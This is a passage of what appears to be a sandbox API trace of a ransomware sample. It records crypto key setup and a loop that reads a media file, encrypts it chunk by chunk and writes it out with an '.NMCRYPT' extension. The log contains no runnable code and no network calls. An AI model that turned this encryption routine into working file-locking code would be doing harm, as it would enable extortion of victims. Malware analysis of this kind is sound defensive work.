pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.690] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.690] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.691] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0151.691] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.691] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad138) returned 1 [0151.691] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0151.691] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0151.691] wcslen (_String="\\\\?\\") returned 0x4 [0151.691] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad8b8) returned 1 [0151.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0151.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0152.487] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=199994) returned 1 [0152.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0152.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.514] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.514] GetLastError () returned 0x0 [0152.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.515] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.515] GetLastError () returned 0x0 [0152.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.515] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.516] GetLastError () returned 0x0 [0152.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.516] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.516] GetLastError () returned 0x0 [0152.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.516] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.516] GetLastError () returned 0x0 [0152.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.516] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.516] GetLastError () returned 0x0 [0152.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.516] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.516] GetLastError () returned 0x0 [0152.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.516] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.516] GetLastError () returned 0x0 [0152.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.517] GetLastError () returned 0x0 [0152.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 